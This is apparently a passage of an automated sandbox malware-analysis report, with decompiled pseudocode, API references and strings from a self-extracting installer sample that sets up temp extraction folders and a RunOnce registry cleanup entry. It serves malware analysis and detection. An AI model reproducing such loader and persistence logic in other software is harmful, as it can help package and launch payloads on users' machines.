				 *0xb88530 = _t66;
				goto L23;
			}

0x00b8202a
0x00b82035
0x00b8203c
0x00b82041
0x00b82050
0x00b8205f
0x00b82064
0x00b8206f
0x00b8208c
0x00b82094
0x00b82257
0x00b82266
0x00b82266
0x00b8209a
0x00b8209b
0x00b8209d
0x00b820aa
0x00b820af
0x00b820c9
0x00b820d1
0x00000000
0x00000000
0x00b820d3
0x00b820da
0x00000000
0x00000000
0x00000000
0x00b820da
0x00b820e2
0x00b82103
0x00b8210e
0x00b82116
0x00b82122
0x00b82128
0x00b8212c
0x00b82179
0x00b82194
0x00b821de
0x00b821e4
0x00b82256
0x00b82256
0x00000000
0x00b82256
0x00b82196
0x00b82196
0x00b8219c
0x00b8219f
0x00b8219f
0x00b821a1
0x00b821a2
0x00b821a6
0x00b821a8
0x00b821b0
0x00b821b0
0x00b821b2
0x00b821b3
0x00b821bc
0x00b821c7
0x00b821cb
0x00b821f1
0x00b821f6
0x00b821fd
0x00b821ff
0x00b821ff
0x00b82204
0x00b82213
0x00b82218
0x00b8221d
0x00b8221d
0x00b82220
0x00b82220
0x00b82222
0x00b82223
0x00b82229
0x00b8223d
0x00b82249
0x00b82250
0x00000000
0x00b82250
0x00b821d2
0x00b821d9
0x00000000
0x00b821d9
0x00b8213a
0x00b82141
0x00b82144
0x00b8214c
0x00000000
0x00000000
0x00b82163
0x00b82172
0x00b82172
0x00000000
0x00b82163
0x00b820ea
0x00b820f0
0x00000000

APIs

memset.MSVCRT ref: 00B82050
memset.MSVCRT ref: 00B8205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00B8208C

Part of subcall function 00B8171E: _vsnprintf.MSVCRT ref: 00B81750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B820C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B820EA
GetSystemDirectoryA.KERNEL32 ref: 00B82103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B82122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00B82134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B82144
GetSystemDirectoryA.KERNEL32 ref: 00B8215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B8218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B821C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B821E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00B8223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B82249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B82250

Strings

wextract_cleanup3, xrefs: 00B820A5, 00B820BE, 00B820F0, 00B82232
wextract_cleanup%d, xrefs: 00B8209E
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00B821F6
DelNodeRunDLL32, xrefs: 00B8212E
advpack.dll, xrefs: 00B82109
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00B82082
%s /D:%s, xrefs: 00B821FF, 00B82210
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B821A8, 00B82204

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
API String ID: 178549006-1916111597
Opcode ID: e5a291af8a60fdc4b7374a50bb46723015613fb617406fe830b6da6357706230
Instruction ID: 3b359e020257cdba720c2691abb16c89f72e83400a7710b4fc6f1221822f12e6
Opcode Fuzzy Hash: e5a291af8a60fdc4b7374a50bb46723015613fb617406fe830b6da6357706230
Instruction Fuzzy Hash: 8651CF71A00214ABEB20BF64DC4DFEA7BACEB55700F1401E9FA49A7171DE719E49CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B855A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00B855A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xb88004; // 0xfbc33aab
				_v8 = _t28 ^ _t110;
				_t2 = E00B8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00B8468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xb89a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xb88b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xb88a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00B86517(_t82, 0x7d2, 0, E00B83210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xb89a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xb891e4;
									_t40 = GetTempPathA(0x104, 0xb891e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00B81781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00B86952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00B8597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00B82630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00B8658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xb891e4;
																					E00B81781(0xb891e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00B85467(0xb891e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00B82630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00B8597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00B85467(0xb891e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xb891e4;
											_t70 = E00B82630(0, 0xb891e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xb891e4;
												_t71 = E00B85467(0xb891e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00B8597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xb88b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00B85467(0xb88b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00B844B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00B844B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xb89124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00B844B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xb89124 = E00B86285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00B86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00b855ab
0x00b855b2
0x00b855c9
0x00b855d5
0x00b855d9
0x00b85600
0x00b85605
0x00b8560a
0x00b8560c
0x00b85638
0x00b85641
0x00b85643
0x00b85645
0x00b85645
0x00b8564c
0x00b85652
0x00b85657
0x00b85659
0x00b85696
0x00b8569c
0x00b8589f
0x00b858a7
0x00b858ac
0x00b858b3
0x00b858b5
0x00b856a2
0x00b856a2
0x00b856a8
0x00000000
0x00b856ae
0x00b856ae
0x00b856b9
0x00b856bf
0x00b856c1
0x00b856f3
0x00b856f3
0x00b85705
0x00b8570a
0x00b85711
0x00b85717
0x00b85724
0x00b85726
0x00b85729
0x00b85730
0x00b85737
0x00b8573d
0x00b85740
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8572b
0x00b8572b
0x00b8572e
0x00b85742
0x00b85742
0x00b85745
0x00b8576b
0x00b8576b
0x00000000
0x00b85747
0x00b85747
0x00b8574d
0x00b8574f
0x00b85771
0x00b85771
0x00b85773
0x00000000
0x00b85751
0x00b85751
0x00b85753
0x00000000
0x00b85755
0x00b8575b
0x00b85760
0x00b85762
0x00000000
0x00b85764
0x00b85764
0x00b85769
0x00b8577e
0x00b8577e
0x00b85781
0x00b85788
0x00b8578d
0x00b8578f
0x00b857b2
0x00b857b8
0x00b857bd
0x00b857bf
0x00b857cd
0x00b857cd
0x00b857dd
0x00b857e3
0x00b857ef
0x00b857f5
0x00b857f8
0x00b8580a
0x00b8580a
0x00b857fa
0x00b85802
0x00b85802
0x00b8580d
0x00b8580f
0x00b85830
0x00b85836
0x00b8583d
0x00b8584b
0x00b85851
0x00b85855
0x00b8585a
0x00b8585c
0x00000000
0x00b8585e
0x00b8585e
0x00000000
0x00b8585e
0x00b85811
0x00b85817
0x00b85819
0x00b8581f
0x00000000
0x00b8581f
0x00b85791
0x00b85797
0x00b8579c
0x00b8579e
0x00000000
0x00b857a0
0x00b857a9
0x00b857ae
0x00b857b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00b857b0
0x00b8579e
0x00000000
0x00000000
0x00000000
0x00b85769
0x00b85762
0x00b85753
0x00b8574f
0x00000000
0x00000000
0x00000000
0x00b8572e
0x00000000
0x00b85864
0x00b85864
0x00b85864
0x00b85717
0x00000000
0x00b856c3
0x00b856c5
0x00b856c9
0x00b856ce
0x00b856d0
0x00000000
0x00b856d6
0x00b856d6
0x00b856d8
0x00b856dd
0x00b856df
0x00000000
0x00b856e1
0x00b856e2
0x00b856e4
0x00b856e6
0x00b856eb
0x00b856ed
0x00000000
0x00b856f3
0x00b856f3
0x00000000
0x00b8586c
0x00b85878
0x00b8587e
0x00b85882
0x00b85883
0x00b85889
0x00b8588e
0x00b8588e
0x00000000
0x00b85896
0x00b856ed
0x00b856df
0x00b856d0
0x00b856c1
0x00b856a8
0x00b8565b
0x00b8565b
0x00b8565d
0x00b85669
0x00b85669
0x00b8565f
0x00b8565f
0x00b85665
0x00b85667
0x00000000
0x00000000
0x00b85667
0x00b8566c
0x00b85673
0x00b85678
0x00b8567a
0x00b8589b
0x00b8589b
0x00b85680
0x00b85685
0x00b8568c
0x00000000
0x00b8568c
0x00b8567a
0x00b8560e
0x00b85613
0x00b8561a
0x00b85620
0x00b85626
0x00000000
0x00b85626
0x00b855db
0x00b855e0
0x00b855e7
0x00b855f1
0x00b855f6
0x00b855f6
0x00b855f6
0x00b858b7
0x00b858c7

APIs

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00B855CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00B85638
LocalFree.KERNEL32(00000000), ref: 00B8564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00B85620

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Part of subcall function 00B86285: GetLastError.KERNEL32(00B85BBC), ref: 00B86285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00B856B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00B8571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00B85737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00B857CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00B857EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00B85802

Part of subcall function 00B82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00B82654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00B85830

Part of subcall function 00B86517: FindResourceA.KERNEL32(00B80000,000007D6,00000005), ref: 00B8652A
Part of subcall function 00B86517: LoadResource.KERNEL32(00B80000,00000000,?,?,00B82EE8,00000000,00B819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00B86538
Part of subcall function 00B86517: DialogBoxIndirectParamA.USER32(00B80000,00000000,00000547,00B819E0,00000000), ref: 00B86557
Part of subcall function 00B86517: FreeResource.KERNEL32(00000000,?,?,00B82EE8,00000000,00B819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00B86560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00B85878

Part of subcall function 00B8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00B859A8
Part of subcall function 00B8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00B859AF

Strings

<None>, xrefs: 00B85632
msdownld.tmp, xrefs: 00B857D3
RUNPROGRAM, xrefs: 00B855BD, 00B85600
Z, xrefs: 00B8570A
A:\, xrefs: 00B856F4
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B856AE, 00B856B3, 00B8583D

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-1782941137
Opcode ID: 6486fefa60aa5f0662365a6dbf2ee47f8835a243674c8caaa42cdc947232d875
Instruction ID: e42c1a5602cf4b80d3d26b52bc1715d753f504559bc4a6c2a692b48559c30da2
Opcode Fuzzy Hash: 6486fefa60aa5f0662365a6dbf2ee47f8835a243674c8caaa42cdc947232d875
Instruction Fuzzy Hash: 7381F475A04A059BEB34BB648C85BEA72EDDB60300F4400E6E586E31B1EF748D86CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B8597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00B8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xb88004; // 0xfbc33aab
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xb89124 = E00B86285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00B844B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xb89a34 & 0x00000008;
							if(( *0xb89a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xb89a38; // 0x0
								_t110 =  *((intOrPtr*)(0xb889e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xb89124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00B8268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xb89a38; // 0x0
							_t110 =  *((intOrPtr*)(0xb889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xb889e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xb89a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00B844B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xb89124 = E00B86285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00B844B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xb89124 = E00B86285();
					_t66 = 0;
					L33:
					return E00B86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x00b8597d
0x00b85988
0x00b8598f
0x00b8599a
0x00b859a6
0x00b859a8
0x00b859af
0x00b859b9
0x00b859dd
0x00b859e4
0x00b859f1
0x00b859fe
0x00b85a0b
0x00b85a13
0x00b85a19
0x00b85a1b
0x00b85ba1
0x00b85baf
0x00b85bbd
0x00b85bd8
0x00b85bde
0x00b85be3
0x00b85bec
0x00b85bf0
0x00b85bfc
0x00b85c02
0x00b85c02
0x00b85c02
0x00b85c04
0x00b85c04
0x00000000
0x00b85c04
0x00b85a27
0x00b85a3a
0x00b85a46
0x00b85a48
0x00b85a4a
0x00000000
0x00000000
0x00b85a64
0x00b85a6a
0x00b85a6c
0x00b85abc
0x00b85ac2
0x00b85ac9
0x00b85aca
0x00b85aca
0x00b85acc
0x00b85acc
0x00b85acf
0x00b85ad1
0x00000000
0x00000000
0x00b85ad3
0x00b85ad6
0x00b85ad8
0x00000000
0x00000000
0x00b85ada
0x00b85adc
0x00b85add
0x00b85add
0x00b85ae0
0x00000000
0x00000000
0x00000000
0x00b85ae0
0x00b85ae2
0x00b85ae4
0x00b85ae6
0x00b85ae6
0x00b85ae6
0x00b85ae9
0x00b85aeb
0x00b85af0
0x00b85af6
0x00b85af8
0x00b85af9
0x00b85af9
0x00b85afb
0x00000000
0x00000000
0x00b85afd
0x00b85aff
0x00b85b00
0x00b85b03
0x00000000
0x00000000
0x00000000
0x00b85b03
0x00b85b05
0x00b85b08
0x00b85b20
0x00b85b27
0x00b85b52
0x00b85b52
0x00b85b5b
0x00b85b62
0x00b85b6b
0x00b85b6d
0x00b85b76
0x00b85b7d
0x00b85b83
0x00b85b7f
0x00b85b7f
0x00b85b7f
0x00b85b6f
0x00b85b72
0x00b85b72
0x00b85b85
0x00b85b98
0x00b85b9e
0x00b85b87
0x00b85b8f
0x00b85b8f
0x00000000
0x00b85b85
0x00b85b29
0x00b85b33
0x00000000
0x00000000
0x00b85b35
0x00b85b48
0x00b85b4a
0x00000000
0x00b85b4a
0x00b85b0f
0x00b85b16
0x00000000
0x00b85b16
0x00b85a7c
0x00b85a8a
0x00b85aa5
0x00b85aab
0x00000000
0x00b859bb
0x00b859c0
0x00b859c7
0x00b859d1
0x00b859d6
0x00b85c05
0x00b85c14
0x00b85c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00B859A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00B859AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00B85A13
MulDiv.KERNEL32(?,?,00000400), ref: 00B85A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B85A64
memset.MSVCRT ref: 00B85A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00B85A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00B85AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00B85BFC

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Part of subcall function 00B86285: GetLastError.KERNEL32(00B85BBC), ref: 00B86285

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: adbeef85027062af2e2ccae9c80c603bdf531ff3741836a6051391172d6976b3
Instruction ID: 26b38db0b698b9e6d7a41bd3de62f947718048e1b59f9e739c5058a085a82369
Opcode Fuzzy Hash: adbeef85027062af2e2ccae9c80c603bdf531ff3741836a6051391172d6976b3
Instruction Fuzzy Hash: F17180B190060CABEB25AF64CCC5FFA77ECEB48344F5440EAF50597160EA309E85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00B84FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00B84FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xb89144 = E00B8468F(_t36, 0, 0);
